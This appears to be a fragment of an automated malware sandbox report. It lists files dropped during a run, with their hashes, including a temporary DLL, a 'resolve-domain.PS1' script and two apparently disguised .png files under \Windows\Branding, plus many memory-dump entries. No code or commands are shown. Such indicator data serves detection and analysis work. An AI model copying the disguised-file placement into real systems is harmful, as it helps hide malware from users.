SHA256 0f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84
SHA512 9e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31

memory/1428-140-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\0oh2zeve\CSC73CAA211EA44F09634A317902A77D0.TMP

MD5 7068c371e467d4f1f0ef646581709c79
SHA1 04a6971a0ac7026230918bdd618764be707f0216
SHA256 db30b6120715a4d1f2e30c58a1892dca24af57f1f0e2826cf203167e44d854c1
SHA512 6fc5ab8e42b065d07741964be6bd12f1e2118178126cfec8c665b3b3467398fc8638d7ed6ffa7833c88a178b39ad037fbaec243ded8d25fe0109fb22cc78dbeb

C:\Users\Admin\AppData\Local\Temp\RESFF4.tmp

MD5 736174f3b5b458ba1d217896a14f4b0f
SHA1 7ae1b95420d1a255777a82be4f48ff8f03a04b4f
SHA256 cb5f85407b0e80ed898a3f1bf58db26065f57af31cb2f6c697166db509ac9dad
SHA512 e656ebcb3d53a77dc810dc776e24ad7fd854fff604642557e0bf92e4ecc95af74816ebe63a66689541b1ae0fdd4f3dddcb873e0a5430d61271502e1fa0393883

C:\Users\Admin\AppData\Local\Temp\0oh2zeve\0oh2zeve.dll

MD5 8307b1ccd9644ce9fca4e1e69cd4a3f1
SHA1 e8c60fbe21eeb0cc9666e40c6789864422223b6f
SHA256 f1a0be8ca304128474019504bc192fb896d58fe3c6f96ece7ff3857c7f0d8f81
SHA512 09dd084a96ee5d89cc8d9c7fa07f9506d28822e7a34327dc42677de45340d935ced4605667b64b4afb4c4ee7b4765646626329321dc2be6598d9f360f0ffe1d3

memory/2416-144-0x000001C26B3E0000-0x000001C26B3E1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1

MD5 43473f4e719958639a9d89e5d8388999
SHA1 ccb79eb606a23daa4b3ff8f996a2fbf281f31491
SHA256 ce84b142a2983e1f60b3051cbff38153424a016178ce3fcf703e3694eb474734
SHA512 1051092c5eae13758e8e01086907effc5c603cc1f9456fb2cdb951cb4b196c5c3d089ffd2e981b5d6731b0e6b24402fb2808a20f66ac6dcb1704a8f4b457b1fa

memory/2416-146-0x000001C26B436000-0x000001C26B438000-memory.dmp

memory/2416-151-0x000001C26C570000-0x000001C26C571000-memory.dmp

memory/2416-152-0x000001C26B438000-0x000001C26B439000-memory.dmp

memory/2416-153-0x000001C26C900000-0x000001C26C901000-memory.dmp

memory/3872-160-0x0000000000000000-mapping.dmp

memory/3872-170-0x0000014EE2430000-0x0000014EE2432000-memory.dmp

memory/3872-171-0x0000014EE2433000-0x0000014EE2435000-memory.dmp

memory/3872-194-0x0000014EE2436000-0x0000014EE2438000-memory.dmp

memory/2008-203-0x0000000000000000-mapping.dmp

memory/3872-212-0x0000014EE2438000-0x0000014EE243A000-memory.dmp

memory/2008-214-0x0000019829CB0000-0x0000019829CB2000-memory.dmp

memory/2008-215-0x0000019829CB3000-0x0000019829CB5000-memory.dmp

memory/4224-242-0x0000000000000000-mapping.dmp

memory/2008-250-0x0000019829CB6000-0x0000019829CB8000-memory.dmp

memory/2008-251-0x0000019829CB8000-0x0000019829CBA000-memory.dmp

memory/4224-287-0x0000016AF2910000-0x0000016AF2912000-memory.dmp

memory/4224-289-0x0000016AF2913000-0x0000016AF2915000-memory.dmp

memory/4224-290-0x0000016AF2916000-0x0000016AF2918000-memory.dmp

memory/4224-291-0x0000016AF2918000-0x0000016AF291A000-memory.dmp

memory/4660-301-0x0000000000000000-mapping.dmp

memory/4680-302-0x0000000000000000-mapping.dmp

memory/4700-303-0x0000000000000000-mapping.dmp

memory/4876-340-0x0000000000000000-mapping.dmp

memory/4896-341-0x0000000000000000-mapping.dmp

memory/4928-344-0x0000000000000000-mapping.dmp

memory/4944-345-0x0000000000000000-mapping.dmp

memory/4960-346-0x0000000000000000-mapping.dmp

memory/4980-347-0x0000000000000000-mapping.dmp

memory/5000-348-0x0000000000000000-mapping.dmp

memory/5016-349-0x0000000000000000-mapping.dmp

memory/5032-350-0x0000000000000000-mapping.dmp

memory/5052-351-0x0000000000000000-mapping.dmp

\Windows\Branding\mediasrv.png

MD5 271eacd9c9ec8531912e043bc9c58a31
SHA1 c86e20c2a10fd5c5bae4910a73fd62008d41233b
SHA256 177d6aab26c15ecf87f29f92ad0eaff355d195de1c0ef17d9cb9b7483c288934
SHA512 87375d3e0c2505ff8d5860db4a9a2cbb88da73f492f2be937b1dfd1afa37133061b7c69121727728835eaf545ce1850ec4889bad33366b8d4dadd7838af791c0

\Windows\Branding\mediasvc.png

MD5 1fa9c1e185a51b6ed443dd782b880b0d
SHA1 50145abf336a196183882ef960d285bd77dd3490
SHA256 f25560518e8bebbc0abdde4c0241833e432ad4c56f934bb18067c1abf7305959
SHA512 16bd50a904fa062f8ec6e41f00000da5d0221164c3eda90bc1791e195b25ef74bb9e1264d7536c204f9a01ca1489ae43484ceb1e7bb4f650aacf90fa16f1c9fc

memory/4136-354-0x0000000000000000-mapping.dmp

memory/4156-355-0x0000000000000000-mapping.dmp

memory/1428-356-0x0000000000000000-mapping.dmp

memory/2164-357-0x0000000000000000-mapping.dmp

memory/2348-358-0x0000000000000000-mapping.dmp

memory/4232-359-0x0000000000000000-mapping.dmp

memory/4416-360-0x0000000000000000-mapping.dmp

memory/4432-361-0x0000000000000000-mapping.dmp

memory/4492-362-0x0000000000000000-mapping.dmp

memory/4364-363-0x0000000000000000-mapping.dmp

memory/4520-364-0x0000000000000000-mapping.dmp

memory/4256-365-0x0000000000000000-mapping.dmp

memory/4576-366-0x0000000000000000-mapping.dmp

memory/2128-367-0x0000000000000000-mapping.dmp

memory/4684-368-0x0000000000000000-mapping.dmp

memory/4704-369-0x0000000000000000-mapping.dmp

memory/4704-382-0x000001515DCC0000-0x000001515DCC2000-memory.dmp

memory/4704-384-0x000001515DCC3000-0x000001515DCC5000-memory.dmp

memory/4704-394-0x000001515DCC6000-0x000001515DCC8000-memory.dmp

memory/4704-395-0x000001515DCC8000-0x000001515DCC9000-memory.dmp

memory/4248-449-0x0000000000000000-mapping.dmp

memory/2348-450-0x0000000000000000-mapping.dmp